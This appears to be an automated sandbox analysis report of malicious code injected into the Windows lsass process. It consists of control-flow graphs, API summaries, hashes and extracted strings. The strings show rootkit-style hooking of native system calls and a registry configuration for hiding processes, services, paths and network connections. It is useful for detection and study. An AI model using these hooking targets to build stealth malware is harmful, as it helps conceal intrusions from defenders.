                                                control_flow_graph 11 202c0ae26f0-202c0ae2774 call 202c0afeca0 14 202c0ae298f-202c0ae29b2 11->14 15 202c0ae277a-202c0ae277d 11->15 15->14 16 202c0ae2783-202c0ae2791 15->16 16->14 17 202c0ae2797-202c0ae27dd call 202c0ae8d50 * 3 GetFileType 16->17 24 202c0ae27df-202c0ae27f3 StrCpyW 17->24 25 202c0ae27f5-202c0ae27ff call 202c0ae1ab8 17->25 26 202c0ae2804-202c0ae2808 24->26 25->26 28 202c0ae280e-202c0ae2827 call 202c0ae3264 call 202c0ae3930 26->28 29 202c0ae28b3-202c0ae28b9 26->29 42 202c0ae285e-202c0ae28a8 call 202c0afeca0 28->42 43 202c0ae2829-202c0ae2858 call 202c0ae3264 call 202c0ae3200 call 202c0ae1e4c 28->43 31 202c0ae28bc-202c0ae28c1 29->31 33 202c0ae28df 31->33 34 202c0ae28c3-202c0ae28c6 31->34 35 202c0ae28e1-202c0ae28fa call 202c0ae3264 call 202c0ae3930 33->35 34->33 37 202c0ae28c8-202c0ae28cb 34->37 53 202c0ae28fc-202c0ae292b call 202c0ae3264 call 202c0ae3200 call 202c0ae1e4c 35->53 54 202c0ae293b-202c0ae293d 35->54 37->33 40 202c0ae28cd-202c0ae28d0 37->40 40->33 44 202c0ae28d2-202c0ae28d5 40->44 42->14 55 202c0ae28ae 42->55 43->14 43->42 44->33 48 202c0ae28d7-202c0ae28dd 44->48 48->33 48->35 53->54 77 202c0ae292d-202c0ae2937 53->77 56 202c0ae2961-202c0ae2964 54->56 57 202c0ae293f-202c0ae295c call 202c0ae86a0 54->57 55->28 62 202c0ae296e-202c0ae2971 56->62 63 202c0ae2966-202c0ae296c 56->63 57->31 67 202c0ae298c 62->67 68 202c0ae2973-202c0ae2976 62->68 63->14 67->14 68->67 70 202c0ae2978-202c0ae297b 68->70 70->67 72 202c0ae297d-202c0ae2980 70->72 72->67 74 202c0ae2982-202c0ae2985 72->74 74->67 76 202c0ae2987-202c0ae298a 74->76 76->14 76->67 77->14 78 202c0ae2939 77->78 78->31
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 69e20323056a9615f1253612b4b675ef762144682d8232d5f9ea75a0753cbd44
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: BE71AE322047C1C6FB289B2699DC3AEA795F754B84F461017DFA947B8BDE35CA288700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 84 202c0ae21cc-202c0ae21f7 call 202c0afece0 86 202c0ae21fd-202c0ae2206 84->86 87 202c0ae220f-202c0ae2212 86->87 88 202c0ae2208-202c0ae220c 86->88 89 202c0ae23cd-202c0ae23ed 87->89 90 202c0ae2218-202c0ae221b 87->90 88->87 91 202c0ae2221-202c0ae2233 90->91 92 202c0ae231d-202c0ae2320 90->92 91->89 93 202c0ae2239-202c0ae224f 91->93 94 202c0ae2391-202c0ae2394 92->94 95 202c0ae2322-202c0ae233c call 202c0ae30b4 92->95 96 202c0ae2251-202c0ae2261 93->96 97 202c0ae227d-202c0ae2288 call 202c0ae1d28 93->97 94->89 98 202c0ae2396-202c0ae23a9 call 202c0ae30b4 94->98 95->89 107 202c0ae2342-202c0ae2358 95->107 96->97 100 202c0ae2263-202c0ae227b StrCmpNIW 96->100 104 202c0ae22a9-202c0ae22bb 97->104 109 202c0ae228a-202c0ae22a2 call 202c0ae1d60 97->109 98->89 108 202c0ae23ab-202c0ae23b3 98->108 100->97 100->104 110 202c0ae22bd-202c0ae22bf 104->110 111 202c0ae22cb-202c0ae22cd 104->111 107->89 112 202c0ae235a-202c0ae2376 107->112 108->89 116 202c0ae23b5-202c0ae23bd 108->116 109->104 126 202c0ae22a4-202c0ae22a7 109->126 118 202c0ae22c1-202c0ae22c4 110->118 119 202c0ae22c6-202c0ae22c9 110->119 113 202c0ae22cf-202c0ae22d2 111->113 114 202c0ae22d4 111->114 115 202c0ae237a-202c0ae238d 112->115 120 202c0ae22d7-202c0ae22da 113->120 114->120 115->115 121 202c0ae238f 115->121 122 202c0ae23c0-202c0ae23cb 116->122 118->120 119->120 124 202c0ae22dc-202c0ae22e2 120->124 125 202c0ae22e8-202c0ae22eb 120->125 121->89 122->89 122->122 124->93 124->125 125->89 127 202c0ae22f1-202c0ae22f5 125->127 126->120 128 202c0ae230c-202c0ae2318 127->128 129 202c0ae22f7-202c0ae22fa 127->129 128->89 129->89 130 202c0ae2300-202c0ae2305 129->130 130->127 131 202c0ae2307 130->131 131->89
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: S$dialer
                                                • API String ID: 756756679-3873981283
                                                • Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                • Instruction ID: 25fb4c50494745b03f6fbfcc80ee10dbaa90343c0eba2f6fdf05f69e3cf436e3
                                                • Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                • Instruction Fuzzy Hash: C051D132B107A5C6FB60CF66988C6AD63E4F744794F069413EFA527B86DB38C869C710

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 0e6e3f53f89941e48a061f18c1508fc8a90b32be57fc0da4f932eebc6dbdb7ec
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: CB013522305B8196FB10DB12A89C76963A1E788FC0F498137CF9943756DE39C9898300

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 2e3fad50795f7a0079a38e66a231913a676bdedf83bff55786a910ba4333ad1d
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 0DF03C73304781D2FB608B25E4DC39D6760F754B88F858023CB894A956DE7DC68CCB00

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 04370fa5f8d30b2195b99abe6e113b6bf610919fa5c6b82f6a71ca1cb9b5a3fa
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 13E03973611700C6FB048B62D84C35936E1EB88B41F4A8126CA0907351DF7E8499C740

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: 235a7f768eb8c3ab9d0458457c1d5a34f9fd9f592f8dc39969e1513678aacc8f
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 3F118073618781C2F721D721B8CE76D2291BB54706F471027ABA6893D7EF3EC0AC8254

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00000202C0AE1650: GetProcessHeap.KERNEL32 ref: 00000202C0AE165B
                                                  • Part of subcall function 00000202C0AE1650: HeapAlloc.KERNEL32 ref: 00000202C0AE166A
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DA
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1707
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1721
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1741
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE175C
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE177C
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1797
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17B7
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE17D2
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17F2
                                                • Sleep.KERNEL32 ref: 00000202C0AE1C43
                                                • SleepEx.KERNEL32 ref: 00000202C0AE1C49
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE180D
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE182D
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1848
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1868
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1883
                                                  • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE18A3
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE18BE
                                                  • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE18C8
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: da309ec870f8e9d4d5b5b498153ffb026461c589e783c2c4c55ac16aa4ae19b4
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: 8F310E36300BA5D1FB509F36DEDD36E12A6AB44FC0F064023DFA987697EE24C8798250

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 189 202c0ab2908-202c0ab2973 call 202c0ab0f34 * 4 198 202c0ab2b8b 189->198 199 202c0ab2979-202c0ab297c 189->199 200 202c0ab2b8d-202c0ab2ba9 198->200 199->198 201 202c0ab2982-202c0ab2985 199->201 201->198 202 202c0ab298b-202c0ab298e 201->202 202->198 203 202c0ab2994-202c0ab29b2 202->203 203->198 205 202c0ab29b8-202c0ab29dc call 202c0ab0d6c 203->205 208 202c0ab2a0b-202c0ab2a12 205->208 209 202c0ab29de-202c0ab2a09 call 202c0ab0d6c 205->209 211 202c0ab2ab2-202c0ab2ab9 208->211 212 202c0ab2a18-202c0ab2a25 208->212 209->208 213 202c0ab2b6c-202c0ab2b89 211->213 214 202c0ab2abf-202c0ab2ad6 211->214 212->211 216 202c0ab2a2b-202c0ab2a39 LoadLibraryA 212->216 213->200 214->213 217 202c0ab2adc 214->217 218 202c0ab2a9d-202c0ab2aa5 216->218 219 202c0ab2a3b-202c0ab2a45 216->219 221 202c0ab2ae2-202c0ab2af7 217->221 218->216 223 202c0ab2aa7-202c0ab2aac 218->223 222 202c0ab2a48-202c0ab2a4c 219->222 224 202c0ab2b5b-202c0ab2b66 221->224 225 202c0ab2af9-202c0ab2b0a 221->225 226 202c0ab2a9a 222->226 227 202c0ab2a4e-202c0ab2a52 222->227 223->211 224->213 224->221 229 202c0ab2b0c-202c0ab2b13 225->229 230 202c0ab2b15-202c0ab2b19 225->230 226->218 231 202c0ab2a7d-202c0ab2a87 227->231 232 202c0ab2a54-202c0ab2a7b 227->232 233 202c0ab2b48-202c0ab2b59 229->233 234 202c0ab2b1b-202c0ab2b22 230->234 235 202c0ab2b24-202c0ab2b28 230->235 236 202c0ab2a8d-202c0ab2a98 231->236 232->236 233->224 233->225 234->233 237 202c0ab2b3a-202c0ab2b3e 235->237 238 202c0ab2b2a-202c0ab2b38 235->238 236->222 237->233 239 202c0ab2b40-202c0ab2b43 237->239 238->233 239->233
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959204478.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ab0000_lsass.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: fe811162bf7b14930204ab85ca965a1531c7317894ac0595a7362860ab0b9f73
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: 5E61FC32701351C7FA68CF2A948CB6DB3A1FB04BA4F568027DB1907786DB38E856C704

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 343 202c0ae2cdc-202c0ae2d42 344 202c0ae2d47-202c0ae2d55 call 202c0afecc0 343->344 346 202c0ae3090-202c0ae30b3 344->346 347 202c0ae2d5b-202c0ae2d61 344->347 347->346 348 202c0ae2d67-202c0ae2d6a 347->348 348->346 349 202c0ae2d70-202c0ae2d73 348->349 349->346 350 202c0ae2d79-202c0ae2d89 GetModuleHandleA 349->350 351 202c0ae2d9d 350->351 352 202c0ae2d8b-202c0ae2d9b call 202c0af3090 350->352 353 202c0ae2da0-202c0ae2dbe 351->353 352->353 353->346 357 202c0ae2dc4-202c0ae2de3 StrCmpNIW 353->357 357->346 358 202c0ae2de9-202c0ae2ded 357->358 358->346 359 202c0ae2df3-202c0ae2dfd 358->359 359->346 360 202c0ae2e03-202c0ae2e0a 359->360 360->346 361 202c0ae2e10-202c0ae2e23 360->361 362 202c0ae2e25-202c0ae2e31 361->362 363 202c0ae2e33 361->363 364 202c0ae2e36-202c0ae2e3a 362->364 363->364 365 202c0ae2e3c-202c0ae2e48 364->365 366 202c0ae2e4a 364->366 367 202c0ae2e4d-202c0ae2e57 365->367 366->367 368 202c0ae2f4d-202c0ae2f51 367->368 369 202c0ae2e5d-202c0ae2e60 367->369 372 202c0ae2f57-202c0ae2f5a 368->372 373 202c0ae3082-202c0ae308a 368->373 370 202c0ae2e72-202c0ae2e7c 369->370 371 202c0ae2e62-202c0ae2e6f call 202c0ae1a14 369->371 375 202c0ae2eb0-202c0ae2eba 370->375 376 202c0ae2e7e-202c0ae2e8b 370->376 371->370 377 202c0ae2f5c-202c0ae2f68 call 202c0ae1a14 372->377 378 202c0ae2f6b-202c0ae2f75 372->378 373->346 373->361 383 202c0ae2ebc-202c0ae2ec9 375->383 384 202c0ae2eea-202c0ae2eed 375->384 376->375 382 202c0ae2e8d-202c0ae2e9a 376->382 377->378 379 202c0ae2f77-202c0ae2f84 378->379 380 202c0ae2fa5-202c0ae2fa8 378->380 379->380 386 202c0ae2f86-202c0ae2f93 379->386 387 202c0ae2faa-202c0ae2fb3 call 202c0ae1d28 380->387 388 202c0ae2fb5-202c0ae2fc2 lstrlenW 380->388 389 202c0ae2e9d-202c0ae2ea3 382->389 383->384 390 202c0ae2ecb-202c0ae2ed8 383->390 391 202c0ae2eef-202c0ae2ef9 call 202c0ae1d28 384->391 392 202c0ae2efb-202c0ae2f08 lstrlenW 384->392 395 202c0ae2f96-202c0ae2f9c 386->395 387->388 406 202c0ae2ffa-202c0ae3005 387->406 401 202c0ae2fc4-202c0ae2fce 388->401 402 202c0ae2fe5-202c0ae2fef call 202c0ae3930 388->402 399 202c0ae2ea9-202c0ae2eae 389->399 400 202c0ae2f43-202c0ae2f48 389->400 403 202c0ae2edb-202c0ae2ee1 390->403 391->392 391->400 396 202c0ae2f0a-202c0ae2f14 392->396 397 202c0ae2f2b-202c0ae2f3d call 202c0ae3930 392->397 405 202c0ae2f9e-202c0ae2fa3 395->405 395->406 396->397 407 202c0ae2f16-202c0ae2f29 call 202c0ae1554 396->407 397->400 410 202c0ae2ff2-202c0ae2ff4 397->410 399->375 399->389 400->410 401->402 411 202c0ae2fd0-202c0ae2fe3 call 202c0ae1554 401->411 402->410 403->400 412 202c0ae2ee3-202c0ae2ee8 403->412 405->380 405->395 415 202c0ae307c-202c0ae3080 406->415 416 202c0ae3007-202c0ae300b 406->416 407->397 407->400 410->373 410->406 411->402 411->406 412->384 412->403 415->373 420 202c0ae300d-202c0ae3011 416->420 421 202c0ae3013-202c0ae302d call 202c0ae86a0 416->421 420->421 424 202c0ae3030-202c0ae3033 420->424 421->424 427 202c0ae3056-202c0ae3059 424->427 428 202c0ae3035-202c0ae3053 call 202c0ae86a0 424->428 427->415 430 202c0ae305b-202c0ae3079 call 202c0ae86a0 427->430 428->427 430->415
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 3357ed6314eabba8fa08e2096083bcb3f05f8c0f1971a8852dd6ac07c7fe1732
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 5CB17B62210B90C2FB689F25D48C7AD63A4FB84B84F565017EFAA53796DF35CDA8C340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 1c79aad55ccd82dee0190766b37111c65c1eb97836056699a6b1e1d23cddf3b8
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 05310473205B80DAEB609F60E8887EE6364F794744F45442BDB9E47A9AEF38C658C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 6b269ed75a72be8ab7d7467a3451bbe869e7fbdbfaf4ff46492a360364212acb
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 1D314C33214B80C6EB60DF25E88879E73A4F788754F510127EBAD47B96EF38C5598B00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: a9daa23172fa6c5d4a107eaeca965a46feea8aae7f9fb40a412d1826de46df25
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 3FE1CB33A04B80DAF710CB66D4886DD7BB1F345788F158217EF9A57B9ADA39C51AC700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 4aaa1fbf0e72b96de9cac81fd4f7ab81f2ee325bf3078e55ecff6abc8cc10923
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: F671F577710B90C5FB109F66E89C69D27A4FB98B88F421123DB8E47A2ADE39C459C740

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: f78ac25c8aa7bdd24b278013f40ef6e62fb5d5911618730387ce5f21f02b6c5f
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: FB514973218B94D2FB14DB62E58C39EB3A1F788B84F458226DB9947B55DF39C069C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 08831ba54b4148c0853c6b321da8959b0ede21d7b4f39930bbab190b657904fb
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: DF3197A2100B8AE0FB04EF69E8DD7DC2321B754384FC35523A769031779E7A866EC390

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: a2b6e8064d34f6058f400fa62b6a60ed05e28081ee27e155f540df09f2b9bfab
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 58211837618B40D2FB109B25E58C75E67A0F789BA4F514217EB9902BAADF3DC54DCB00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: beb3484aa7eb7072961678706af01f231505dba17c28f7f05dceca5e8fb339fc
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 38418273214B90D7E7608F52E48879EB7A1F388B84F01822BDB9907B55DF38D169CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 62707e5ddcb1c22e119202a5bac5f5c202d9faddf4cc597c2adbdb7861f3ec9d
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 0481E4227047C1C6FB54AB29A8CD36D2291BB95780F1A4017DBE947797DF39CAAD8700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
